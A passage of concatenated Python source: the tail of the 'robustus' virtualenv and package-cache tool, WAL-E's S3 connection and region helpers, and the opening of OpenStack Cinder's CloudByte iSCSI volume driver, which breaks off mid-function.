return False # do not print done, do not add package to the list of cached packages
else:
rob = os.path.join(self.cache, requirement_specifier.rob_filename())
if os.path.isfile(rob):
# package cached
# open for reading so install script can read required information
rob_file = open(rob, 'r')
else:
# package not cached
# open for writing so install script can save required information
rob_file = open(rob, 'w')
try:
try:
# try to use specific install script
install_module = importlib.import_module('robustus.detail.install_%s' % requirement_specifier.name.lower())
install_module.install(self, requirement_specifier, rob_file, ignore_index)
except ImportError:
self.install_through_wheeling(requirement_specifier, rob_file, ignore_index)
except Exception as exc:
logging.warn('Exception during installation: %s' % str(exc))
rob_file.close()
logging.warn('Robustus will delete the corresponding %s file in order '
'to recreate the wheel in the future. Please run again.' % str(rob))
# remove specifier from cached packages
self.cached_packages = [r for r in self.cached_packages
if r.freeze() != requirement_specifier.freeze()]
os.remove(rob)
return False
# add requirement to the list of cached packages
if self.find_satisfactory_requirement(requirement_specifier) is None:
self.cached_packages.append(requirement_specifier)
logging.info('Done')
return True
def find_satisfactory_requirement(self, requirement_specifier):
for requirement in self.cached_packages:
if requirement_specifier.allows(requirement):
return requirement
return None
def tag(self, args):
tag_name = args.tag
self._perrepo('git tag %s' % tag_name)
self._perrepo('git push origin %s' % tag_name)
def checkout(self, args):
self._perrepo('git fetch origin')
self._perrepo('git checkout -b {0} origin/{0}'.format(args.tag))
def perrepo(self, args):
# Use git to find the top-level working folder and run the command
cmd_str = ' '.join(args.command)
self._perrepo(cmd_str)
def reset(self, args):
if not args.force:
# Make sure that the user is sure
print 'Warning: this will delete any local changes you have made to the repos in this project. Press y to go ahead.'
if get_single_char().lower() != 'y':
print 'Aborting'
return
self._perrepo('git checkout -f')
self._perrepo('git checkout master')
self._perrepo('git pull origin master')
def _perrepo(self, cmd_str):
verbose = self.settings['verbosity'] > 0
run_shell('cd "$(git rev-parse --show-toplevel)" && . "%s" && %s'
% (self._activate_path(), cmd_str), shell=True, verbose=verbose)
for d in os.listdir(os.path.join(self.env, 'src')):
full_path = os.path.join(self.env, 'src', d)
if os.path.isdir(full_path):
logging.info('Running command in %s' % full_path)
run_shell('cd "%s" && . "%s" && %s' % (full_path, self._activate_path(),
cmd_str), shell=True, verbose=verbose)
def _activate_path(self):
"""Return the path to the virtual env activate file."""
return os.path.join(self.env, 'bin', 'activate')
def install(self, args):
# grab index locations
logging.info('Starting Robustus install using robustus version %s' % __version__)
if args.find_links is not None:
self.settings['find_links'] = args.find_links
# determine whether to do cloning of editable non-versioned requirements
self.settings['update_editables'] = args.update_editables
self.settings['no_remote_cache'] = args.no_remote_cache
self.settings['ignore_missing_refs'] = args.ignore_missing_refs
self.settings['allow_external'] = args.allow_external
self.settings['allow_all_external'] = args.allow_all_external
self.settings['allow_unverified'] = args.allow_unverified
tag = args.tag
if tag is not None:
logging.info('Installing with tag %s ignore_missing_refs=%s' %
(tag, str(self.settings['ignore_missing_refs'])))
self.settings['attempts'] = args.attempts
# construct requirements list
specifiers = args.packages
if args.editable is not None:
specifiers += ['-e ' + r for r in args.editable]
# NOTE: If "tag=tag" is not passed to "expand_requirements_specifiers", then the
# "requirements.txt" files expanded will be those on the default/"master" branch
# (i.e., default kwarg "tag=None") not the branch/tag indicated by value of "tag".
visited_sites = collections.OrderedDict()
requirements = expand_requirements_specifiers(specifiers, tag=tag, visited_sites=visited_sites,
ignore_missing_refs=self.settings['ignore_missing_refs'])
if args.requirement is not None:
for requirement_file in args.requirement:
requirements += read_requirement_file(requirement_file, tag,
ignore_missing_refs = self.settings['ignore_missing_refs'],
visited_sites=visited_sites)
if len(requirements) == 0:
raise RobustusException('You must give at least one requirement to install (see "robustus install -h")')
requirements = remove_duplicate_requirements(requirements)
logging.info('Here are all packages cached in robustus:\n' +
'\n'.join([r.freeze() for r in self.cached_packages]) + '\n')
logging.info('Here are all the requirements robustus is going to install:\n' +
'\n'.join([r.freeze() for r in requirements]) + '\n')
logging.info('These are all packages that were specified: \n' +
generate_dependency_list(visited_sites, selected_requirements=requirements))
# workaround for xcode 5.1 upgrade. clang fails if there are unused arguments
# specified during installation of some packages (cython, pygame, etc).
if sys.platform.startswith('darwin'):
os.environ['CFLAGS'] = '-Qunused-arguments'
os.environ['CPPFLAGS'] = '-Qunused-arguments'
# install
for requirement_specifier in requirements:
self.install_requirement(requirement_specifier, args.no_index, tag)
# Display the branch of the currently installed repos.
src_dirs = [os.path.join(os.getcwd(), 'venv', 'src', r.base_name().replace('_', '-')) for r in requirements if r.editable]
logging.info('{0} Running on the following branches: {0}'.format('='*10))
old_dir = os.getcwd()
for directory in src_dirs:
_, name_of_repo = os.path.split(directory)
try:
os.chdir(directory)
msg =subprocess.check_output('git branch -rv --abbrev=40|grep $(git rev-parse HEAD)', shell=True)
try:
active_branch |= re.search('\\*\w+master', msg).group(0)
except Exception as err:
# Try a second option
pass
active_branch = re.search('origin/\w*', msg).group(0)
# http://stackoverflow.com/questions/6657690/python-getoutput-equivalent-in-subprocess
except Exception as err:
active_branch = ('<Could not find active branch - %s: %s>. Branch might be out-of-sync with origin. '
'Try running git pull and git push.' % (err.__class__.__name__, err.message))
# Debug what the hell is wrong
commands_to_try = ['git status', 'git branch -r', 'git branch']
for cmd in commands_to_try:
logging.info('-'*20)
logging.info('Trying command "%s"...' % cmd)
try:
msg = subprocess.check_output(cmd, shell=True)
logging.info(msg)
logging.info('...Success')
except Exception as err:
logging.info('... Failed with error - %s: %s' % (err.__class__.__name__, err.message))
logging.info('-'*20)
logging.info(' %s: %s' % (name_of_repo, active_branch))
os.chdir(old_dir)
logging.info('='*56)
def search_pkg_config_locations(self, locations=None):
"""
Search for pkg-config files locations. Usually all libraries are going to '<env>/lib' folder, so
search it recursively for *.pc files.
"""
if locations is None:
locations = [os.path.abspath(os.path.join(self.env, 'lib'))]
pkg_files_dirs = set()
for loc in locations:
for root, dirnames, filenames in os.walk(loc):
for filename in fnmatch.filter(filenames, '*.pc'):
pkg_files_dirs.add(root)
return list(pkg_files_dirs)
def install_cmake_package(self, requirement_specifier, cmake_options, ignore_index, clone_url=None, install_dir=None):
"""
Build and install cmake package into cache & copy it to env.
"""
pkg_cache_dir = os.path.abspath(os.path.join(self.cache, '%s-%s' % (requirement_specifier.name,
requirement_specifier.version)))
def in_cache():
return os.path.isdir(pkg_cache_dir)
if not in_cache() and not ignore_index:
cwd = os.getcwd()
archive = None
download_dir = None
try:
if clone_url is not None:
retcode = run_shell(['git', 'clone', clone_url],
verbose=self.settings['verbosity'] >= 1)
if retcode != 0:
raise RequirementException('Failed to clone %s' % clone_url)
download_dir = os.path.abspath(requirement_specifier.name)
os.chdir(download_dir)
# checkout specific version (branch)
if requirement_specifier.version is not None:
retcode = run_shell(['git', 'checkout', '-b', requirement_specifier.version,
'--track', 'origin/%s' % requirement_specifier.version],
verbose=self.settings['verbosity'] >= 1)
if retcode != 0:
raise RequirementException('Failed to checkout branch %s in %s' % (requirement_specifier.version,
requirement_specifier.name))
# update submodules if any
run_shell(['git', 'submodule', 'update', '--init'],
verbose=self.settings['verbosity'] >= 1)
else:
archive = self.download(requirement_specifier.name, requirement_specifier.version)
download_dir = unpack(archive)
os.chdir(download_dir)
logging.info('Building %s' % requirement_specifier.name)
env = os.environ.copy()
env['PKG_CONFIG_PATH'] = ','.join(self.search_pkg_config_locations())
retcode = run_shell(['cmake', '.', '-DCMAKE_INSTALL_PREFIX=%s' % pkg_cache_dir] + cmake_options,
env=env,
verbose=self.settings['verbosity'] >= 1)
if retcode != 0:
raise RequirementException('%s configure failed' % requirement_specifier.name)
# on bStem we can build only in single thread, but bStem has 2 cores, thus
# we are using this weird formula to determine number of threads for make
retcode = run_shell(['make', '-j%i' % max(multiprocessing.cpu_count() / 2, 1)],
verbose=self.settings['verbosity'] >= 1)
if retcode != 0:
raise RequirementException('%s build failed' % requirement_specifier.name)
retcode = run_shell(['make', 'install'],
verbose=self.settings['verbosity'] >= 1)
if retcode != 0:
raise RequirementException('%s "make install" failed' % requirement_specifier.name)
except:
safe_remove(pkg_cache_dir)
raise
finally:
os.chdir(cwd)
safe_remove(archive)
safe_remove(download_dir)
if in_cache():
if install_dir is not None:
if os.path.exists(install_dir):
shutil.rmtree(install_dir)
shutil.copytree(pkg_cache_dir, install_dir)
else:
# install directly into venv
install_dir = self.env
distutils.dir_util._path_created = {}
distutils.dir_util.copy_tree(pkg_cache_dir, install_dir)
else:
raise RequirementException('can\'t find %s-%s in robustus cache' % (requirement_specifier.name, requirement_specifier.version))
return install_dir
def freeze(self, args):
for requirement in self.cached_packages:
print requirement.freeze()
def download(self, package, version):
"""
Download package archive, look for locations specified using --find-links. Store archive in current
working folder.
:param package: package name
:param version: package version
:return: path to archive
"""
logging.info('Searching for package archive %s-%s' % (package, version))
archive_base_name = '%s-%s' % (package, version)
extensions = ['.tar.gz', '.tar.bz2', '.zip']
for index in self.settings['find_links']:
for archive_name in [archive_base_name + ext for ext in extensions]:
try:
download(os.path.join(index, archive_name), archive_name, verbose=self.settings['verbosity'] >= 2)
return os.path.abspath(archive_name)
except urllib2.URLError:
pass
raise RequirementException('Failed to find package archive %s-%s' % (package, version))
def download_compiled_archive(self, package, version):
"""
Download compiled package archive, look for locations specified using --find-links. Store archive in current
working folder.
:param package: package name
:param version: package version
:return: path to archive or None if not found
"""
if self.settings['no_remote_cache']:
return None
if not platform.machine():
logging.warn('Cannot determine architecture from "platform.machine()".')
return None
archive_base_name = '%s-%s-%s' % (package, version, platform.machine())
logging.info('Searching for compiled package archive %s' % archive_base_name)
extensions = ['.compiled.tar.gz', '.compiled.tar.bz2', '.compiled.zip']
for index in self.settings['find_links']:
for archive_name in [archive_base_name + ext for ext in extensions]:
try:
download(os.path.join(index, archive_name), archive_name, verbose=self.settings['verbosity'] >= 2)
return os.path.abspath(archive_name)
except urllib2.URLError:
pass
logging.info('Failed to find compiled package archive %s' % archive_base_name)
return None
def download_cache_from_amazon(self, filename, bucket_name, key, secret):
if filename is None or bucket_name is None:
raise RobustusException('In order to download from amazon S3 you should specify filename,'
'bucket, access key and secret access key, see "robustus download_cache -h"')
try:
import boto
from boto.s3.key import Key
# set boto lib debug to critical
logging.getLogger('boto').setLevel(logging.CRITICAL)
# connect to the bucket
conn = boto.connect_s3(key, secret)
bucket = conn.get_bucket(bucket_name)
# go through the list of files
cwd = os.getcwd()
os.chdir(self.cache)
for l in bucket.list():
if str(l.key) == filename:
l.get_contents_to_filename(filename)
break
os.chdir(cwd)
if not os.path.exists(os.path.join(self.cache, filename)):
raise RobustusException('Can\'t find file %s in amazon cloud bucket %s' % (filename, bucket_name))
except ImportError:
raise RobustusException('To use S3 cloud install boto library into robustus virtual')
except Exception as e:
raise RobustusException(e.message)
def download_cache(self, args):
"""
Download wheels (binary package archives) from wheelhouse_url and unzip them in wheelhouse
@return: None
"""
cwd = os.getcwd()
os.chdir(self.cache)
wheelhouse_archive = os.path.basename(args.url)
try:
if args.bucket is not None:
self.download_cache_from_amazon(wheelhouse_archive, args.bucket, args.key, args.secret)
else:
logging.info('Downloading ' + args.url)
subprocess.call(['rsync', '-r', '-l', args.url, '.'])
except:
os.chdir(cwd)
raise
wheelhouse_archive_lowercase = wheelhouse_archive.lower()
if wheelhouse_archive_lowercase.endswith('.tar.gz'):
logging.info('Unzipping')
subprocess.call(['tar', '-xzvf', wheelhouse_archive])
elif wheelhouse_archive_lowercase.endswith('.tar.bz'):
logging.info('Unzipping')
subprocess.call(['tar', '-xjvf', wheelhouse_archive])
elif wheelhouse_archive_lowercase.endswith('.zip'):
logging.info('Unzipping')
subprocess.call(['unzip', wheelhouse_archive])
if os.path.isfile(wheelhouse_archive):
os.remove(wheelhouse_archive)
os.chdir(cwd)
logging.info('Done')
def upload_cache_to_amazon(self, filename, bucket_name, key, secret, public):
if filename is None or bucket_name is None or key is None or secret is None:
raise RobustusException('In order to upload to amazon S3 you should specify filename,'
'bucket, access key and secret access key, see "robustus upload_cache -h"')
if os.path.isdir(filename):
raise RobustusException('Can\'t upload directory to amazon S3, please specify archive name')
try:
import boto
from boto.s3.key import Key
# set boto lib debug to critical
logging.getLogger('boto').setLevel(logging.CRITICAL)
# connect to the bucket
conn = boto.connect_s3(key, secret)
bucket = conn.get_bucket(bucket_name)
# create a key to keep track of our file in the storage
k = Key(bucket)
k.key = filename
k.set_contents_from_filename(filename)
if public:
k.make_public()
except ImportError:
raise RobustusException('To use S3 cloud install boto library into robustus virtual')
except Exception as e:
raise RobustusException(e.message)
def upload_cache(self, args):
cwd = os.getcwd()
os.chdir(self.cache)
# compress cache
cache_archive = os.path.basename(args.url)
cache_archive_lowercase = cache_archive.lower()
if cache_archive_lowercase.endswith('.tar.gz'):
subprocess.call(['tar', '-zcvf', cache_archive] + os.listdir(os.getcwd()))
elif cache_archive_lowercase.endswith('.tar.bz'):
subprocess.call(['tar', '-jcvf', cache_archive] + os.listdir(os.getcwd()))
elif cache_archive_lowercase.endswith('.zip'):
subprocess.call(['zip', cache_archive] + os.listdir(os.getcwd()))
try:
if args.bucket is not None:
self.upload_cache_to_amazon(cache_archive, args.bucket, args.key, args.secret, args.public)
else:
for file in glob.iglob('*'):
subprocess.call(['rsync', '-r', '-l', file, args.url])
finally:
if os.path.isfile(cache_archive):
os.remove(cache_archive)
os.chdir(cwd)
@staticmethod
def _create_args_parser():
parser = argparse.ArgumentParser(description='Tool to make and configure python virtualenv,'
'setup necessary packages and cache them if necessary.',
prog='robustus')
parser.add_argument('--env', help='virtualenv to use')
parser.add_argument('--cache', help='binary package cache directory')
parser.add_argument('-v',
'--verbose',
default=0,
action='count',
dest="verbosity",
help='give more output, option is additive, and can be used up to 3 times')
parser.add_argument('--debug',
action='store_true',
help="Take actions to assist with debugging such as not deleting packages which fail to build.")
subparsers = parser.add_subparsers(help='robustus commands')
env_parser = subparsers.add_parser('env', help='make robustus')
env_parser.add_argument('env',
default='.env',
help='virtualenv arguments')
env_parser.add_argument('-p', '--python',
help='python interpreter to use')
env_parser.add_argument('--prompt',
default='(robustus)',
help='provides an alternative prompt prefix for this environment')
env_parser.add_argument('--system-site-packages',
default=False,
action='store_true',
help='give access to the global site-packages dir to the virtual environment')
env_parser.set_defaults(func=Robustus.env)
install_parser = subparsers.add_parser('install', help='install packages')
install_parser.add_argument('-r', '--requirement',
action='append',
help='install all the packages listed in the given'
'requirements file, this option can be used multiple times.')
install_parser.add_argument('packages',
nargs='*',
help='packages to install in format <package name>==version')
install_parser.add_argument('-e', '--editable',
action='append',
help='installs package in editable mode')
install_parser.add_argument('--no-index',
action='store_true',
help='ignore package index (only looking in robustus cache and at --find-links URLs)')
install_parser.add_argument('-f', '--find-links',
action='append',
help='location where to find robustus packages, also is passed to pip')
install_parser.add_argument('--update-editables',
action='store_true',
help='clone all editable non-versioned requirements inside venv '
'(by default robustus skips editable requiterements)')
install_parser.add_argument('--tag',
action='store',
help='Install editables using tag or branch')
install_parser.add_argument('--ignore-missing-refs',
action='store_true',
help='Warn only but no error if a tag is missing (use with --tag)')
install_parser.add_argument('--no-remote-cache',
action='store_true',
help='Do not use remote cache for downloading of wheels')
install_parser.add_argument('--attempts',
action='store',
type=int,
help='Number of attempts to install a package.'
'Usefull when working with a bad network when network errors are possible',
default = 2)
install_parser.add_argument('--allow-external',
action='store',
nargs='+',
default=[],
help='allow pip to install selected external packages')
install_parser.add_argument('--allow-all-external',
action='store_true',
help='allow pip to install external packages')
install_parser.add_argument('--allow-unverified',
action='store',
nargs='+',
default=[],
help='allow pip to install selected unverified packages')
install_parser.set_defaults(func=Robustus.install)
perrepo_parser = subparsers.add_parser('perrepo',
help='Run command across the editable repos')
perrepo_parser.add_argument('command', nargs=argparse.REMAINDER)
perrepo_parser.set_defaults(func=Robustus.perrepo)
reset_parser = subparsers.add_parser('reset',
help='Reset all repos to clean master state')
reset_parser.add_argument('-f', '--force', action='store_true', default = False)
reset_parser.set_defaults(func=Robustus.reset)
tag = subparsers.add_parser('tag',
help='Tag all editable repos and push tags')
tag.add_argument('tag', action='store')
tag.set_defaults(func=Robustus.tag)
checkout = subparsers.add_parser('checkout',
help='Perrepo shortcut to checkout a tag on all editables')
checkout.add_argument('tag', action='store')
checkout.set_defaults(func=Robustus.checkout)
freeze_parser = subparsers.add_parser('freeze', help='list cached binary packages')
freeze_parser.set_defaults(func=Robustus.freeze)
download_cache_parser = subparsers.add_parser('download-cache', help='download cache fom server or path,'
'if robustus cache is not empty,'
'cached packages will be added to existing ones')
download_cache_parser.add_argument('url', help='cache url (directory, *.tar.gz, *.tar.bz or *.zip)')
download_cache_parser.add_argument('-b', '--bucket',
help='amazon S3 bucket to download from')
download_cache_parser.add_argument('-k', '--key',
help='amazon S3 access key')
download_cache_parser.add_argument('-s', '--secret',
help='amazon S3 secret access key')
download_cache_parser.set_defaults(func=Robustus.download_cache)
upload_cache_parser = subparsers.add_parser('upload-cache', help='upload cache to server or path')
upload_cache_parser.add_argument('url', help='cache filename or url (directory, *.tar.gz, *.tar.bz or *.zip)')
upload_cache_parser.add_argument('-b', '--bucket',
help='amazon S3 bucket to upload into')
upload_cache_parser.add_argument('-k', '--key',
help='amazon S3 access key')
upload_cache_parser.add_argument('-s', '--secret',
help='amazon S3 secret access key')
upload_cache_parser.add_argument('-p', '--public',
action='store_true',
default=False,
help='make uploaded file to amazon S3 public')
upload_cache_parser.set_defaults(func=Robustus.upload_cache)
return parser
def execute(self, argv):
"""
Execute command in environment handled by robustus object.
"""
parser = Robustus._create_args_parser()
args = parser.parse_args(argv)
if args.func == Robustus.env:
Robustus.env(args)
else:
args.func(self, args)
def execute(argv):
logging.basicConfig(format="%(message)s", level=logging.INFO)
parser = Robustus._create_args_parser()
args = parser.parse_args(argv)
try:
if args.func == Robustus.env:
Robustus.env(args)
else:
robustus = Robustus(args)
args.func(robustus, args)
except (RobustusException, RequirementException) as exc:
logging.critical(exc.message)
exit(1)
except NameError as exc:
# Handle name errors specially since otherwise the way python does
# bin scripts it results in robustus being executed twice (which can
# be very confusing when debugging scripts)
import traceback
traceback.print_exc()
if __name__ == '__main__':
execute(sys.argv[1:])
|
|
import boto
from boto import s3
from boto.s3 import connection
from wal_e import log_help
logger = log_help.WalELogger(__name__)
_S3_REGIONS = {
# A map like this is actually defined in boto.s3 in newer versions of boto
# but we reproduce it here for the folks (notably, Ubuntu 12.04) on older
# versions.
'ap-northeast-1': 's3-ap-northeast-1.amazonaws.com',
'ap-southeast-1': 's3-ap-southeast-1.amazonaws.com',
'ap-southeast-2': 's3-ap-southeast-2.amazonaws.com',
'eu-west-1': 's3-eu-west-1.amazonaws.com',
'sa-east-1': 's3-sa-east-1.amazonaws.com',
'us-standard': 's3.amazonaws.com',
'us-west-1': 's3-us-west-1.amazonaws.com',
'us-west-2': 's3-us-west-2.amazonaws.com',
}
try:
# Override the hard-coded region map with boto's mappings if
# available.
from boto.s3 import regions
_S3_REGIONS.update(dict((r.name, r.endpoint) for r in regions()))
except ImportError:
pass
def _is_ipv4_like(s):
"""Find if a string superficially looks like an IPv4 address.
AWS documentation plays it fast and loose with this; in other
regions, it seems like even non-valid IPv4 addresses (in
particular, ones that possess decimal numbers out of range for
IPv4) are rejected.
"""
parts = s.split('.')
if len(parts) != 4:
return False
for part in parts:
try:
int(part)
except ValueError:
return False
return True
def _is_mostly_subdomain_compatible(bucket_name):
"""Returns True if SubdomainCallingFormat can be used...mostly
This checks to make sure that putting aside certificate validation
issues that a bucket_name is able to use the
SubdomainCallingFormat.
"""
return (bucket_name.lower() == bucket_name and
len(bucket_name) >= 3 and
len(bucket_name) <= 63 and
'_' not in bucket_name and
'..' not in bucket_name and
'-.' not in bucket_name and
'.-' not in bucket_name and
not bucket_name.startswith('-') and
not bucket_name.endswith('-') and
not bucket_name.startswith('.') and
not bucket_name.endswith('.') and
not _is_ipv4_like(bucket_name))
def _connect_secureish(*args, **kwargs):
"""Connect using the safest available options.
This turns on encryption (works in all supported boto versions)
and certificate validation (in the subset of supported boto
versions that can handle certificate validation, namely, those
after 2.6.0).
Versions below 2.6 don't support the validate_certs option to
S3Connection, and enable it via configuration option just seems to
cause an error.
"""
if tuple(int(x) for x in boto.__version__.split('.')) >= (2, 6, 0):
kwargs['validate_certs'] = True
kwargs['is_secure'] = True
return connection.S3Connection(*args, **kwargs)
class CallingInfo(object):
"""Encapsulate information used to produce a S3Connection."""
def __init__(self, bucket_name=None, calling_format=None, region=None,
ordinary_endpoint=None):
self.bucket_name = bucket_name
self.calling_format = calling_format
self.region = region
self.ordinary_endpoint = ordinary_endpoint
def __repr__(self):
return ('CallingInfo({bucket_name}, {calling_format!r}, {region!r}, '
'{ordinary_endpoint!r})'.format(**self.__dict__))
def __str__(self):
return repr(self)
def connect(self, creds):
"""Return a boto S3Connection set up with great care.
This includes TLS settings, calling format selection, and
region detection.
The credentials are applied by the caller because in many
cases (instance-profile IAM) it is possible for those
credentials to fluctuate rapidly. By comparison, region
fluctuations of a bucket name are not nearly so likely versus
the gains of not looking up a bucket's region over and over.
"""
def _conn_help(*args, **kwargs):
return _connect_secureish(
*args,
provider=creds,
calling_format=self.calling_format(),
**kwargs)
# Check if subdomain format compatible; no need to go through
# any region detection mumbo-jumbo of any kind.
if self.calling_format is connection.SubdomainCallingFormat:
return _conn_help()
# Check if OrdinaryCallingFormat compatible, but also see if
# the endpoint has already been set, in which case only
# setting the host= flag is necessary.
assert self.calling_format is connection.OrdinaryCallingFormat
if self.ordinary_endpoint is not None:
return _conn_help(host=self.ordinary_endpoint)
# By this point, this is an OrdinaryCallingFormat bucket that
# has never had its region detected in this CallingInfo
# instance. So, detect its region (this can happen without
# knowing the right regional endpoint) and store it to speed
# future calls.
assert self.calling_format is connection.OrdinaryCallingFormat
assert self.region is None
assert self.ordinary_endpoint is None
conn = _conn_help()
bucket = s3.bucket.Bucket(connection=conn,
name=self.bucket_name)
try:
loc = bucket.get_location()
except boto.exception.S3ResponseError, e:
if e.status == 403:
# A 403 can be caused by IAM keys that do not permit
# GetBucketLocation. To not change behavior for
# environments that do not have GetBucketLocation
# allowed, fall back to the default endpoint,
# preserving behavior for those using us-standard.
logger.warning(msg='cannot detect location of bucket',
detail=('The specified bucket name was: ' +
repr(self.bucket_name)),
hint=('Permit the GetLocation permission for '
'the provided AWS credentials. '
'Or, use a bucket name that follows the '
'preferred bucket naming guidelines '
'and has no dots in it.'))
self.region = 'us-standard'
self.ordinary_endpoint = _S3_REGIONS[self.region]
else:
raise
else:
# An empty, successful get location returns an empty
# string to mean S3-Classic/US-Standard.
if loc == '':
loc = 'us-standard'
self.region = loc
self.ordinary_endpoint = _S3_REGIONS[loc]
# Region/endpoint information completed: connect.
assert self.ordinary_endpoint is not None
return _conn_help(host=self.ordinary_endpoint)
def from_store_name(bucket_name):
"""Construct a CallingInfo value from a bucket name.
This is useful to encapsulate the ugliness of setting up S3
connections, especially with regions and TLS certificates are
involved.
"""
mostly_ok = _is_mostly_subdomain_compatible(bucket_name)
if not mostly_ok:
return CallingInfo(
bucket_name=bucket_name,
region='us-standard',
calling_format=connection.OrdinaryCallingFormat,
ordinary_endpoint=_S3_REGIONS['us-standard'])
else:
if '.' in bucket_name:
# The bucket_name might have been DNS compatible, but once
# dots are involved TLS certificate validations will
# certainly fail even if that's the case.
return CallingInfo(
bucket_name=bucket_name,
calling_format=connection.OrdinaryCallingFormat,
region=None,
ordinary_endpoint=None)
else:
# If the bucket follows naming rules and has no dots in
# the name, SubdomainCallingFormat can be used, with TLS,
# world-wide, and WAL-E can be region-oblivious.
return CallingInfo(
bucket_name=bucket_name,
calling_format=connection.SubdomainCallingFormat,
region=None,
ordinary_endpoint=None)
assert False
|
|
# Copyright 2015 CloudByte Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import httplib
import json
import time
import urllib
from oslo_utils import units
import six
from cinder import exception
from cinder.i18n import _, _LE, _LI
from cinder.openstack.common import log as logging
from cinder.openstack.common import loopingcall
from cinder.volume.drivers.cloudbyte import options
from cinder.volume.drivers.san import san
LOG = logging.getLogger(__name__)
class CloudByteISCSIDriver(san.SanISCSIDriver):
"""CloudByte ISCSI Driver.
Version history:
1.0.0 - Initial driver
"""
VERSION = '1.0.0'
volume_stats = {}
def __init__(self, *args, **kwargs):
super(CloudByteISCSIDriver, self).__init__(*args, **kwargs)
self.configuration.append_config_values(
options.cloudbyte_add_qosgroup_opts)
self.configuration.append_config_values(
options.cloudbyte_create_volume_opts)
self.configuration.append_config_values(
options.cloudbyte_connection_opts)
self.get_volume_stats()
def _get_url(self, cmd, params, apikey):
"""Will prepare URL that connects to CloudByte."""
if params is None:
params = {}
params['command'] = cmd
params['response'] = 'json'
sanitized_params = {}
for key in params:
value = params[key]
if value is not None:
sanitized_params[key] = six.text_type(value)
sanitized_params = urllib.urlencode(sanitized_params)
url = ('/client/api?%s' % sanitized_params)
LOG.debug("CloudByte URL to be executed: [%s].", url)
# Add the apikey
api = {}
api['apiKey'] = apikey
url = url + '&' + urllib.urlencode(api)
return url
def _extract_http_error(self, error_data):
# Extract the error message from error_data
error_msg = ""
# error_data is a single key value dict
for key, value in error_data.iteritems():
error_msg = value.get('errortext')
return error_msg
def _execute_and_get_response_details(self, host, url):
"""Will prepare response after executing an http request."""
res_details = {}
try:
# Prepare the connection
connection = httplib.HTTPSConnection(host)
# Make the connection
connection.request('GET', url)
# Extract the response as the connection was successful
response = connection.getresponse()
# Read the response
data = response.read()
# Transform the json string into a py object
data = json.loads(data)
# Extract http error msg if any
error_details = None
if response.status != 200:
error_details = self._extract_http_error(data)
# Prepare the return object
res_details['data'] = data
res_details['error'] = error_details
res_details['http_status'] = response.status
finally:
connection.close()
LOG.debug("CloudByte connection was closed successfully.")
return res_details
def _api_request_for_cloudbyte(self, cmd, params, version=None):
"""Make http calls to CloudByte."""
LOG.debug("Executing CloudByte API for command [%s].", cmd)
if version is None:
version = CloudByteISCSIDriver.VERSION
# Below is retrieved from /etc/cinder/cinder.conf
apikey = self.configuration.cb_apikey
if apikey is None:
msg = (_("API key is missing for CloudByte driver."))
raise exception.VolumeBackendAPIException(data=msg)
host = self.configuration.san_ip
# Construct the CloudByte URL with query params
url = self._get_url(cmd, params, apikey)
data = {}
error_details = None
http_status = None
try:
# Execute CloudByte API & frame the response
res_obj = self._execute_and_get_response_details(host, url)
data = res_obj['data']
error_details = res_obj['error']
http_status = res_obj['http_status']
except httplib.HTTPException as ex:
msg = (_("Error executing CloudByte API [%(cmd)s], "
"Error: %(err)s.") %
{'cmd': cmd, 'err': ex})
raise exception.VolumeBackendAPIException(data=msg)
# Check if it was an error response from CloudByte
if http_status != 200:
msg = (_("Failed to execute CloudByte API [%(cmd)s]."
" Http status: %(status)s,"
" Error: %(error)s.") %
{'cmd': cmd, 'status': http_status,
'error': error_details})
raise exception.VolumeBackendAPIException(data=msg)
LOG.info(_LI("CloudByte API executed successfully for command [%s]."),
cmd)
return data
def _request_tsm_details(self, account_id):
params = {"accountid": account_id}
# List all CloudByte tsm
data = self._api_request_for_cloudbyte("listTsm", params)
return data
def _override_params(self, default_dict, filtered_user_dict):
"""Override the default config values with user provided values.
"""
if filtered_user_dict is None:
# Nothing to override
return default_dict
for key, value in default_dict.iteritems():
# Fill the user dict with default options based on condition
if filtered_user_dict.get(key) is None and value is not None:
filtered_user_dict[key] = value
return filtered_user_dict
def _add_qos_group_request(self, volume, tsmid, volume_name):
# Get qos related params from configuration
params = self.configuration.cb_add_qosgroup
if params is None:
params = {}
params['name'] = "QoS_" + volume_name
params['tsmid'] = tsmid
data = self._api_request_for_cloudbyte("addQosGroup", params)
return data
def _create_volume_request(self, volume, datasetid, qosgroupid,
tsmid, volume_name):
size = volume.get('size')
quotasize = six.text_type(size) + "G"
# Prepare the user input params
params = {
"datasetid": datasetid,
"name": volume_name,
"qosgroupid": qosgroupid,
"tsmid": tsmid,
"quotasize": quotasize
}
# Get the additional params from configuration
params = self._override_params(self.configuration.cb_create_volume,
params)
data = self._api_request_for_cloudbyte("createVolume", params)
return data
def _queryAsyncJobResult_request(self, jobid):
async_cmd = "queryAsyncJobResult"
params = {
"jobId": jobid,
}
data = self._api_request_for_cloudbyte(async_cmd, params)
return data
def _get_tsm_details(self, data, tsm_name):
# Filter required tsm's details
tsms = data['listTsmResponse']['listTsm']
tsmdetails = {}
for tsm in tsms:
if tsm['name'] == tsm_name:
tsmdetails['datasetid'] = tsm['datasetid']
tsmdetails['tsmid'] = tsm['id']
break
return tsmdetails
def _wait_for_volume_creation(self, volume_response, cb_volume_name):
"""Given the job wait for it to complete."""
vol_res = volume_response.get('createvolumeresponse')
if vol_res is None:
msg = _("Null response received while creating volume [%s] "
"at CloudByte storage.") % cb_volume_name
raise exception.VolumeBackendAPIException(data=msg)
jobid = vol_res.get('jobid')
if jobid is None:
msg = _("Jobid not found in CloudByte's "
"create volume [%s] response.") % cb_volume_name
raise exception.VolumeBackendAPIException(data=msg)
def _retry_check_for_volume_creation():
"""Called at an interval till the volume is created."""
retries = kwargs['retries']
max_retries = kwargs['max_retries']
jobid = kwargs['jobid']
cb_vol = kwargs['cb_vol']
# Query the CloudByte storage with this jobid
volume_response = self._queryAsyncJobResult_request(jobid)
result_res = None
if volume_response is not None:
result_res = volume_response.get('queryasyncjobresultresponse')
if volume_response is None or result_res is None:
msg = _(
"Null response received while querying "
"for create volume job [%s] "
"at CloudByte storage.") % jobid
raise exception.VolumeBackendAPIException(data=msg)
status = result_res.get('jobstatus')
if status == 1:
